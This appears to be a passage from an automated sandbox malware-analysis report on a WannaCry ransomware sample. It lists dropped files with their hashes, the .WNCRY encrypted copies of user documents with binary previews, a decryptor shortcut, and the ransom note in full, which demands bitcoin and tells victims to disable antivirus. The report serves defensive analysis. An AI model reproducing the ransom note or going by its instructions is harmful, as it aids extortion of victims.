.}....+.[..FJ..>..........{#..srCP.............NN.pAW"..R.S.@{.k.7o."..N].)....M..}..X.`

                                C:\Users\user\Documents\PIVFAGEAAV.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.847876858206974
                                Encrypted:false
                                SSDEEP:24:bkK4kzYcLDMh/hx+H9uC7o98wPRXj1oZt3ArrPMZegQQtDi8iQ0nc1yzA59YN6sj:bklky/wdV7ouwPtCZAfPMZegQQtDi8il
                                MD5:EFB94E62B4916D0005CD4B82E73236CC
                                SHA1:423C1324CB518B69FE186D37AAC7FEFD22F0BE3A
                                SHA-256:B73D4939C424100E561F39879F909A5683946EC21D84969D9C4EBAA75260BE51
                                SHA-512:569C9129C95A51A8B5634B3A06303144DC9B0A53FBDC6C8F6E58AA720E0D1DC86D46329174785B8ECAA9D580C1CC8586F20B2702387B6EDD2075D9F8B09AA11B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......1T...k......Otp..zj-.../.3...a..".2...m.{..E.-+.rG....L..E..(.8`..jeY..}....e..ne.H..A..{~.y...8....V..T...n..p....$.B....g.....T7....,...B|.....#K....y1..pUY .(...`.....agi......+_..'..=J...VW....Yh.c...)z.M......7V.A.XG.M.....='....u.|..............b...b.b.R.Dn.s.+...b..`.5'?..).....P..6T....AH...)A~a...EWj.#.d...$_.....}....K| .'..h...(..L..h8....~..aN.U.(<[...J..*....N.o.PH~.."{......2.e1..A..9./...j..I..i;(.0.>R.....H...q.9.o..o....U6....^..|O.V...W....I .r.9k.!....M.71^..A.C(t.^...r....c........`...Y..S..^.{.-..Q...K.. ..T}.I....t...v9e.$...1.?w6.K.%=.N....E....i...S.o...$h.iD.9..X..(.Z.v...>..c.....o:...w&.-....#..=h..\U..\...;._.'{....y...k*..,.O\.-...US=...w`..#...j.......!.<. ...4...B(.....L.*......qeh.s.@....I..7..`.Z.G...%vP+..c|.........N.>.....f.l..H.h9.7..;u.(..IAzi.J.#N:...=...7*.."..(..........v .+....+...V.U.....d...B@..3q....o.W..k ..t.J.....E.5...T8..`S..E.$...C<.m.c....k....v..."....

                                C:\Users\user\Documents\PIVFAGEAAV.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.847876858206974
                                Encrypted:false
                                SSDEEP:24:bkK4kzYcLDMh/hx+H9uC7o98wPRXj1oZt3ArrPMZegQQtDi8iQ0nc1yzA59YN6sj:bklky/wdV7ouwPtCZAfPMZegQQtDi8il
                                MD5:EFB94E62B4916D0005CD4B82E73236CC
                                SHA1:423C1324CB518B69FE186D37AAC7FEFD22F0BE3A
                                SHA-256:B73D4939C424100E561F39879F909A5683946EC21D84969D9C4EBAA75260BE51
                                SHA-512:569C9129C95A51A8B5634B3A06303144DC9B0A53FBDC6C8F6E58AA720E0D1DC86D46329174785B8ECAA9D580C1CC8586F20B2702387B6EDD2075D9F8B09AA11B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......1T...k......Otp..zj-.../.3...a..".2...m.{..E.-+.rG....L..E..(.8`..jeY..}....e..ne.H..A..{~.y...8....V..T...n..p....$.B....g.....T7....,...B|.....#K....y1..pUY .(...`.....agi......+_..'..=J...VW....Yh.c...)z.M......7V.A.XG.M.....='....u.|..............b...b.b.R.Dn.s.+...b..`.5'?..).....P..6T....AH...)A~a...EWj.#.d...$_.....}....K| .'..h...(..L..h8....~..aN.U.(<[...J..*....N.o.PH~.."{......2.e1..A..9./...j..I..i;(.0.>R.....H...q.9.o..o....U6....^..|O.V...W....I .r.9k.!....M.71^..A.C(t.^...r....c........`...Y..S..^.{.-..Q...K.. ..T}.I....t...v9e.$...1.?w6.K.%=.N....E....i...S.o...$h.iD.9..X..(.Z.v...>..c.....o:...w&.-....#..=h..\U..\...;._.'{....y...k*..,.O\.-...US=...w`..#...j.......!.<. ...4...B(.....L.*......qeh.s.@....I..7..`.Z.G...%vP+..c|.........N.>.....f.l..H.h9.7..;u.(..IAzi.J.#N:...=...7*.."..(..........v .+....+...V.U.....d...B@..3q....o.W..k ..t.J.....E.5...T8..`S..E.$...C<.m.c....k....v..."....

                                C:\Users\user\Documents\PIVFAGEAAV\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Documents\PIVFAGEAAV\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\Documents\PIVFAGEAAV\BNAGMGSPLO.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.797520945849408
                                Encrypted:false
                                SSDEEP:24:yJjUwxn3Tr3/dPEEFZpfJ7TU1E2YJ1X6mbJvhFW:yJ7ZTr3/dPrZpRnn/J1tbFhFW
                                MD5:52A6B25E49BE4E5D1F51C07BCF832B14
                                SHA1:5CD474970A55A5467D3186A0C1A980CA6FF1F530
                                SHA-256:42C1C27494643F98CDD5CAB1A98481D8B9AAB464F84C77F7E50E9AA0CE28918D
                                SHA-512:436ED29C76BA216AD9041AEA10ECC496FCD560C3C5E9C06856DB25D408A4453BC9533CAA1977A3704E1DBF59AB5D4E75C99664284F9380A8D0C7E7285AB06B53
                                Malicious:false
                                Reputation:unknown
                                Preview:,.az.!9..=ca..I..O..}..2..^G?..}.je.*r1.m.....*I+.8.W.Ts.....".}....G......".....8b.Z..(.|.n..oJK..yzw.....E:.'.8T`.Yc...p.9K.s.q.?....jO..a..X....{.%F.AR..B...-.._.....hz..'..#....E..#7.[,!.=..+.).........O.m...b.?.=.G....=@..<lys3.......ei..f".j.8.=.?.|....,..K..D.z..M..6{.|3.S..I.B.X+..^.#'....L`.W;..[.rd..7....8ob..W....*..S.>..g.....MkH"J.X|.g>............[..]JU?..,.qW0..9.U..^...O.a...3..ZTI.....d/.aY....9j0.<....t.e.8...p.#)..N.{....V..:.6..o....t.=..`i7...m.%bw.f.....h(.Mu..("....O.)....X...,.7.r.V-.7.Jr...(...\I.V..L...?....<8....8........?........*$e-r...............rY..R..N.|c1. d.gb`dV..l.EE.s..j:...drW...qh.c.W.w..m....UO.w.;M...5...ZWg.-..MT!.p.N%..0......kiE..~M^m.!...<..[h.u.~.>.Y.......K..r..S.;qutA....^)...V....5.. .whX.r.Jt.{P.X..{. .../...V<G..h...I...O.?....PBc......T.$.T{.....~1R.Fh.".3.6Fl....s.>....,..GYE.3....Dz.V.b....H3d...Nj1..do..E.H........t&...K..O.X..;.....SGM.;..`....0.b...^.S....n..I.lW.25.A.%.....<...l.}.

                                C:\Users\user\Documents\PIVFAGEAAV\BNAGMGSPLO.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.826261221658806
                                Encrypted:false
                                SSDEEP:24:bkHtE4XTR+eYT0oVrpCajjFyeZOPOBq8LG5QhT5k8TP+6Vyoth/hsVv+lvVw:bkHtMtr/FHsPOBq8LGCV5Won/WVv+lq
                                MD5:1C6CC02A918B6B70B4A48FC499044CCD
                                SHA1:98F417DFC9EC2DC48EDE5A6A71CD490B420D318C
                                SHA-256:3C6507370453B75315F529EBFBB9C637EFF66EB4BDBCBD9C5DDEEED89A2B3046
                                SHA-512:F0ED06C48A26E1ECE8A8937729C718F382CF18F3453FD1D75A8AAFC688ED56598290C6BD47F8E2493BD3E3C3BDCB4B752574FBA2347EAD8B50672F1956C74ED7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....5.]L..a..B......3k$G..p.......H.S..$..z.p..B...K....s.J.k..fw#.G..........O....A.....W...H.s....:;......h..G..#g.X.V.^.....1C..uy)./.<.lyPM.Z.$LA.$...c.$.0........*.....'...k.g.&..g.l.t...E%...y......4...^.....T.z..C........v...b..{.....7..................s%.A.{^z.`.....X.].....q.....=.:8$w.(.F.v^........m...."...,.=$}.M..%E.)....`.b.N...#m..M..m`.....'m<..A.W?...!.nYVx.5..o......).z4j>..".Z....h<q...-.B_.V."..m-(..9.f.;+..\...xF.oRu...E..../lql........mvn.p..:..{.aS#...#.}._cK.......6.}V>o..z.4tN.n:R..Hy.. .<gF..~h.P!Bf...|............q>.6........g.W..Msd.,..>p..(H.H....t.._........%.JT{.._..b7Y..J.M7.?!....Bv,.U...#*y...^.I.lM.<d...C<&7ctv...7..g.:.a)...c.L..zj..R......o....L...f7L......no....JL]F.h.{...o.o..[u._..!...a....i?.<!F`).(8[....e......f....*W7..A.N..A..M..P.k..Qdqb.....CDb....... F.A{....;..5.`S.....(..1..ec;*.?..0...,T...j...Omz/..{q..T......t2..l..I....6..~..'#.r...._.'..m..-....p/...h ).....<....#.d.......X/X.u..G

                                C:\Users\user\Documents\PIVFAGEAAV\BNAGMGSPLO.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.826261221658806
                                Encrypted:false
                                SSDEEP:24:bkHtE4XTR+eYT0oVrpCajjFyeZOPOBq8LG5QhT5k8TP+6Vyoth/hsVv+lvVw:bkHtMtr/FHsPOBq8LGCV5Won/WVv+lq
                                MD5:1C6CC02A918B6B70B4A48FC499044CCD
                                SHA1:98F417DFC9EC2DC48EDE5A6A71CD490B420D318C
                                SHA-256:3C6507370453B75315F529EBFBB9C637EFF66EB4BDBCBD9C5DDEEED89A2B3046
                                SHA-512:F0ED06C48A26E1ECE8A8937729C718F382CF18F3453FD1D75A8AAFC688ED56598290C6BD47F8E2493BD3E3C3BDCB4B752574FBA2347EAD8B50672F1956C74ED7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....5.]L..a..B......3k$G..p.......H.S..$..z.p..B...K....s.J.k..fw#.G..........O....A.....W...H.s....:;......h..G..#g.X.V.^.....1C..uy)./.<.lyPM.Z.$LA.$...c.$.0........*.....'...k.g.&..g.l.t...E%...y......4...^.....T.z..C........v...b..{.....7..................s%.A.{^z.`.....X.].....q.....=.:8$w.(.F.v^........m...."...,.=$}.M..%E.)....`.b.N...#m..M..m`.....'m<..A.W?...!.nYVx.5..o......).z4j>..".Z....h<q...-.B_.V."..m-(..9.f.;+..\...xF.oRu...E..../lql........mvn.p..:..{.aS#...#.}._cK.......6.}V>o..z.4tN.n:R..Hy.. .<gF..~h.P!Bf...|............q>.6........g.W..Msd.,..>p..(H.H....t.._........%.JT{.._..b7Y..J.M7.?!....Bv,.U...#*y...^.I.lM.<d...C<&7ctv...7..g.:.a)...c.L..zj..R......o....L...f7L......no....JL]F.h.{...o.o..[u._..!...a....i?.<!F`).(8[....e......f....*W7..A.N..A..M..P.k..Qdqb.....CDb....... F.A{....;..5.`S.....(..1..ec;*.?..0...,T...j...Omz/..{q..T......t2..l..I....6..~..'#.r...._.'..m..-....p/...h ).....<....#.d.......X/X.u..G

                                C:\Users\user\Documents\PIVFAGEAAV\EEGWXUHVUG.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.830056735934519
                                Encrypted:false
                                SSDEEP:12:IhhUebRvpnjmOsaGEvPybY6Guk8X2u9lnxw1mrXEY0IMX1+tgdfANPiwEjhAeVy+:uR1JpjGWPyE6Guk8GufxA6nXkZR8+l
                                MD5:B691AFBE4C872EE57BE3B1726C85542C
                                SHA1:690119BD587510BE129E011E6B389C6DC027CB1F
                                SHA-256:8CF47955317A3C930AE82B26FECE869293E2F4DB82F172292D8D52F86935D3A3
                                SHA-512:E4D94B0A7110265669DBE1CB9605E37F4C398ACA467013B31B36D091AF20A3347CCD626CB8ACF9C71720A7F5BB65277CCCF0338EE30DA621BF02418B18DF676D
                                Malicious:false
                                Reputation:unknown
                                Preview:.&.P....[+V.(6q=..Nc.)4t.0..._O............>.e.....+.Q...f,...^L..X...dc..(..5...I.H.}1tt`:VB4SS?F}O3y~..Na..0.3.{C.C........lbd...z...)]....\vcU3'.K..I..Ai...?....*..;.,.K?.......^..K..r..ht.%a5.x*Cp._..;..z.2p.G...'../...5...Bq.........%.sI......sF...I4...-.Q...x..v...q.....^......G.d..V...vk+......<.q)l...U.D..Z....,U...X..n....&...-X....6.....<.%..xU8.).F.$j.^p..O..#._K...).w.g.N"...$gW$..j,.IM..f[A.pH...5..\.E8`g....;...!.x...E>.w.._..N......@..t...JT._....Z.9.>.V!\N.mg.|.....W..4U...p...P...]...a...^......U...G....4..nMY...8.M. ....C....[.F..E[7w.>.....6..E.'.wg0.+Vw.4.3'.F.E.s'..u....^.$.<.\.......D..{.tav..L...{.....`..eB1;......m..E)...G...h,.?Aeq.3.ho......C..y.y........m..C......s?.?W..gQ...xlhSMz..?.+...J...2....^.Cx.a......@0.,ac_P..).X.Q..KA.6..a...<..e..u._.s....$...ug!.8*D..#.|X9.].I....!$.....U2i7...S...K.T.E..\..(..a4.jc..Y.......e..o..`.Ax.g.."..B..$.P....@...P.u..|...uyG....O.....e..5..C:. ........G...[.....G.x"

                                C:\Users\user\Documents\PIVFAGEAAV\EEGWXUHVUG.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839919853759067
                                Encrypted:false
                                SSDEEP:24:bkNsR5hQgfeMqRP/Pm/FybOI4V5T35vf0ixyG9opmLJy/oK9cxn08pRZlNU:bk4GgfeTRP/PmGT6p5vTPum1Ub2pti
                                MD5:582259F4F31667EC91450CC1FD7E59D6
                                SHA1:85F3DF6AAE9E290E95D1DD3A0A228B2C9E90E8CD
                                SHA-256:65E56E6146A20EAA8D43C073D61941B8156159F131F83D2D4BD9D40AED34769C
                                SHA-512:F8E5ED7E9AAA24E4892FDBFC15451F5A4DC452B43D369EA8FB20C123958270A3E346D1CA81DD747C0E2ED27A27190D0F1FE719F16AF230DA381B759E41CEBE9E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....V~..../~e..tLO.D......%.~..Y...{e...s..d.^....t;..hrNp..'.....G......\I{G.7..'c.r%...^....g....*.8.....,......l.p...Ef=..T^.....m0..f_9l4k..Y.Y!WjL.R\..7.o..y...#!..>.u....s.XZ...Q.RN:.u......9..%.. 3Ozn.F.!.p<v.8..._........E.S%...<...X............"B..........P.u.}.r..."....%|'I.c...........V?...G.5....'.;$.vr....._B%.z,...R...m8U.a&.o.u..0..l.........G..\W.|/3T...u....G.Q..9w...:f...j).O..V..s.yM.1`9....'...^{...=1.F..O..$..,.....M.`qG5G!....;w!.s...G.C.^=...2......o..}...v.{?..A..mk.+3U.<..Z...._....&.2..Uq.Zk..@<9....pt.V>..@.'...<..}..8bi.X....\+~.u"#/;SE.ig.....m!.%.,ke7k...\p..@..--=.WO.s..C....VIS..^.........!..'.B.........uG..aw..h9.q....(.0...9.*.....-.&...qd8pPS.xg..p.Q.B..G.....T.Z..e..YJ....p!.`.l..3. ...e.g;t.v.;<z.hM...ZR...r0.|...g....+....~b....."8.\........'..=...{...kl.X....g(_...K.r0.3..H.+g#'/........C..jHN:.2.f..$0.{......v.{p.."...b.......p.#......D......2......>...O1..M*.?...5KG..F.."./..5

                                C:\Users\user\Documents\PIVFAGEAAV\EEGWXUHVUG.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839919853759067
                                Encrypted:false
                                SSDEEP:24:bkNsR5hQgfeMqRP/Pm/FybOI4V5T35vf0ixyG9opmLJy/oK9cxn08pRZlNU:bk4GgfeTRP/PmGT6p5vTPum1Ub2pti
                                MD5:582259F4F31667EC91450CC1FD7E59D6
                                SHA1:85F3DF6AAE9E290E95D1DD3A0A228B2C9E90E8CD
                                SHA-256:65E56E6146A20EAA8D43C073D61941B8156159F131F83D2D4BD9D40AED34769C
                                SHA-512:F8E5ED7E9AAA24E4892FDBFC15451F5A4DC452B43D369EA8FB20C123958270A3E346D1CA81DD747C0E2ED27A27190D0F1FE719F16AF230DA381B759E41CEBE9E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....V~..../~e..tLO.D......%.~..Y...{e...s..d.^....t;..hrNp..'.....G......\I{G.7..'c.r%...^....g....*.8.....,......l.p...Ef=..T^.....m0..f_9l4k..Y.Y!WjL.R\..7.o..y...#!..>.u....s.XZ...Q.RN:.u......9..%.. 3Ozn.F.!.p<v.8..._........E.S%...<...X............"B..........P.u.}.r..."....%|'I.c...........V?...G.5....'.;$.vr....._B%.z,...R...m8U.a&.o.u..0..l.........G..\W.|/3T...u....G.Q..9w...:f...j).O..V..s.yM.1`9....'...^{...=1.F..O..$..,.....M.`qG5G!....;w!.s...G.C.^=...2......o..}...v.{?..A..mk.+3U.<..Z...._....&.2..Uq.Zk..@<9....pt.V>..@.'...<..}..8bi.X....\+~.u"#/;SE.ig.....m!.%.,ke7k...\p..@..--=.WO.s..C....VIS..^.........!..'.B.........uG..aw..h9.q....(.0...9.*.....-.&...qd8pPS.xg..p.Q.B..G.....T.Z..e..YJ....p!.`.l..3. ...e.g;t.v.;<z.hM...ZR...r0.|...g....+....~b....."8.\........'..=...{...kl.X....g(_...K.r0.3..H.+g#'/........C..jHN:.2.f..$0.{......v.{p.."...b.......p.#......D......2......>...O1..M*.?...5KG..F.."./..5

                                C:\Users\user\Documents\PIVFAGEAAV\EFOYFBOLXA.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.821736657797796
                                Encrypted:false
                                SSDEEP:24:ox00OXrinJmitWAYKqJhxtdImlXJtaUYoXPnO9xuCC9fMRLmJ:oJObgJZtbqhImlZb/O9kfSW
                                MD5:FA4B7799C649E18CDFD9C2D7DEDCEE91
                                SHA1:03EFAA14F650E48677537F7F88A7E6B2BB0F42A1
                                SHA-256:5FF9E5FCBAB200E22DCD20F717BD758E0FA222D6FBC9C95F994303F9C121F632
                                SHA-512:F33EEA0D1EA75657CD05A3DD22EC1913C5D2E1045146826D360CD69CBDC3707BA3FC2D18CEF24271364B224F2F136B5E97500AF6477C13A920E003B4B7411A74
                                Malicious:false
                                Reputation:unknown
                                Preview:.....^..4EAi.=..JO.d.L*..2.^J......_.i.......`&0P...AG.4..f......>..seB.b..'@...H..A..*......f.ujq.~o,9=~.`.pN.j.EH...V,....Col~Rh.9..J.].\lF[oN......JQ9...X........~......p.7#I......*!.K..=.e.6..aEe.... .:.J.(...........u..].....+....g.E.Z%..`.......:r..u...A...x{.K..}./...Md..v..gb)....1.>.;......).S.x$Q.on..;.0.B0... FN.m.gF^.<....T..~k...RD..f~.1Q5..-J........L...../KX.i..\x....P..c.7k...}.].?@..........n..YNe.<0..*.+.[..._....,.......|p..Pi........B.g..?._.}8.AT.`....N.v..B.E....m..).n..d..T@.......?.....`....Lz|.Ylk'.....k..d}Tju.....v.....f..b......`...A..7./.R..d.H.......!.HB...s.K^.#\...Q.....1Zj...0.?...........<\t...u.o.._.......xcZ,4.X.!..D.W@..........)..VU0..D.<..+e.:.,..4.5.........ZA..|.S..L#..3.9..r.yQ.....q..@mwp...c-.b.F;d/_y.xR.>..Hh).yMt..e....q..=.0.a.U.]~..\Y.=.Z......<kM..X....V..`.}.1.^d7.....4l.8........)~...Y..z......:ph.ee....f....L.../.LE"b...B..}.V..SbT6.P.g...9.[..6......0g.6Q.R....~.J...&..F.YT)..I;\.R

                                C:\Users\user\Documents\PIVFAGEAAV\EFOYFBOLXA.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.831166004001975
                                Encrypted:false
                                SSDEEP:24:bksXFk8YGnOf0TICH2FXUeLLvF+0SE6fUcjuISX1qMc0PBqJf5GvAJuVGtOC0j:bksXXVnfTIu2FkSt+0KfXuIiG0PwJfv0
                                MD5:A4C2DAECDBEF5A06DCAB493F2B7B3323
                                SHA1:EE94AD4D874497DA24F0106FC27EEA67341CC7C8
                                SHA-256:9FE8DCA993D2BFBA8DCBA6434C40B39127AF5B3F331777249A04A6C9E5624F83
                                SHA-512:D96C29430E7EE33F06961E874194540B5EAF9941FD19482EC6AE570C87A1F9D1FAC9DF9FD25B7043E1B2FDB5D1599B4D8B9E79D501C8D52CB66CDD13C28876AE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......E...._....Q...A,..j....\.,..1K#.;M..&S.G.N..h.S.1R.o.L..K.n,.D....`...TK....H......p{..&.N......S.5......Bw)^......J..P.]..JT..k....Cx...[T.q.v..:e.qqx.+.c.@..h...|.\.....0.*.....y.=......_N...S.J]...*.a.v<....yj~S.i._=..e].G.....*26....W...............l..Z....*.c..1.t....w....O....w.I...35.2..ck.L...."..2..l.T.....(.Y:..X.~.z.....z.....4.{2...j..=..R...!........Z>.R..#y..]....61%..f.>.....H..c...=l......b.YI:.+.<..<...A....I.zZ.......I.3..{..h..WG....y..~.h-..x..2T.8.......,......7.k@O........3..8.)...S..<~BA...$B#z..k...r.`..( -....).._..q...*.^.x.i.y.f......X@@......{;..e...G..P.?...q...S~.Q..6K.pI|.J.Tf.9.lY..(...o.?.\.....@.(M...V.<C......+.>&."......;..9P1...n....)D. ....v...*.:..V..../...T...)W...B......,......T.9|....r0AF......xuT~.!.U8...D..%...7%7. ..a....|Acq.V......4v...j$R..#.../i..b.........#..}.J.~|.#.)dY.....w..W.~.fG7y.b..m=%.l..wy|.C.5.=.<.X'..B...>"w.c..G..........$.-c7..&....'..2.....^.....1

                                C:\Users\user\Documents\PIVFAGEAAV\EFOYFBOLXA.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.831166004001975
                                Encrypted:false
                                SSDEEP:24:bksXFk8YGnOf0TICH2FXUeLLvF+0SE6fUcjuISX1qMc0PBqJf5GvAJuVGtOC0j:bksXXVnfTIu2FkSt+0KfXuIiG0PwJfv0
                                MD5:A4C2DAECDBEF5A06DCAB493F2B7B3323
                                SHA1:EE94AD4D874497DA24F0106FC27EEA67341CC7C8
                                SHA-256:9FE8DCA993D2BFBA8DCBA6434C40B39127AF5B3F331777249A04A6C9E5624F83
                                SHA-512:D96C29430E7EE33F06961E874194540B5EAF9941FD19482EC6AE570C87A1F9D1FAC9DF9FD25B7043E1B2FDB5D1599B4D8B9E79D501C8D52CB66CDD13C28876AE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......E...._....Q...A,..j....\.,..1K#.;M..&S.G.N..h.S.1R.o.L..K.n,.D....`...TK....H......p{..&.N......S.5......Bw)^......J..P.]..JT..k....Cx...[T.q.v..:e.qqx.+.c.@..h...|.\.....0.*.....y.=......_N...S.J]...*.a.v<....yj~S.i._=..e].G.....*26....W...............l..Z....*.c..1.t....w....O....w.I...35.2..ck.L...."..2..l.T.....(.Y:..X.~.z.....z.....4.{2...j..=..R...!........Z>.R..#y..]....61%..f.>.....H..c...=l......b.YI:.+.<..<...A....I.zZ.......I.3..{..h..WG....y..~.h-..x..2T.8.......,......7.k@O........3..8.)...S..<~BA...$B#z..k...r.`..( -....).._..q...*.^.x.i.y.f......X@@......{;..e...G..P.?...q...S~.Q..6K.pI|.J.Tf.9.lY..(...o.?.\.....@.(M...V.<C......+.>&."......;..9P1...n....)D. ....v...*.:..V..../...T...)W...B......,......T.9|....r0AF......xuT~.!.U8...D..%...7%7. ..a....|Acq.V......4v...j$R..#.../i..b.........#..}.J.~|.#.)dY.....w..W.~.fG7y.b..m=%.l..wy|.C.5.=.<.X'..B...>"w.c..G..........$.-c7..&....'..2.....^.....1

                                C:\Users\user\Documents\PIVFAGEAAV\NVWZAPQSQL.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.798945641474471
                                Encrypted:false
                                SSDEEP:24:Of65gI3p8oIb5v9ZWblQnNdochn9ZOBC9RhrdPLQ1wr/dK6:C83p8NNoYn9mCBdPVDdK6
                                MD5:55F0410C87961EE951EDA57A3A15223A
                                SHA1:236BB0E545382D0D767DD26647EFB07960B24523
                                SHA-256:6231E2BA2F03609A39DC28E1296B799B6B22E6345581D7EBD3B407A9B7CF4DFF
                                SHA-512:6F2C71447FA8F385A51290088A93430CFBBBC13FB1CB28040A9FAAF9716F3E84ADA50BFD9ECE6F1FF44651933611FEF70FB611814D7AB5363350314633667A57
                                Malicious:false
                                Reputation:unknown
                                Preview:.[..Q& b+C........&Xl?=_9...N..VF.:Ys`+....lW.3..k.$...<6!.......|...e(<G.,.Fe2......SP5I...+8.D..c=...8...M.....;..$p...DM%q..........8.........h..R.e.....L.v...w..K....g.dp......q%E.4.M....a..-.%.\..&...Um.`..d$?6]..~...T>5Op..`q.R.xiR....+.....$J..1...7@\I..HV.e.v..FU...f.q4q.Q.S......}=...2F........f....K.....'5a'..,1......&.........G.Xh,....,.....x@...58...... ......[.....k7.q..c.Q.X..m.0{..:.=.N..=\w...D.8.Ij..P c\.F.)f-.iO.+..hp....C..x....SD.8,s..n..J.. .>..=..2...~^...W.%..2..{79E.Qt......#d5>(..W......l.....)'.F.....@n.....%.C..c.v..N.}..;.....W.C.~ph4..t`....+.D[.Y."......~.s...0..6v@.ZB)t....6.S.........q.........p..Q.?y.}..._p..8..@E^..+2q.v@.; ~.8~....\..y1Vuz.'.,.%../.j....sQ........v!^.-y.B.H..../.?./.;.O.b........7v/U..V.x.... .T..t...2.A#3NET\...0#..m...<.+>+.3~(/...X[.$..%.%C[.......2.C......e.N..0.W.XP_;;...k..'.....OD..9....H_3..5.../.7....,%.uX..L.C...bHT.E.=Pr.v.....w..Q?9 mM_..FQH......Z"..uD.D..v..>...A...

                                C:\Users\user\Documents\PIVFAGEAAV\NVWZAPQSQL.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83754194698253
                                Encrypted:false
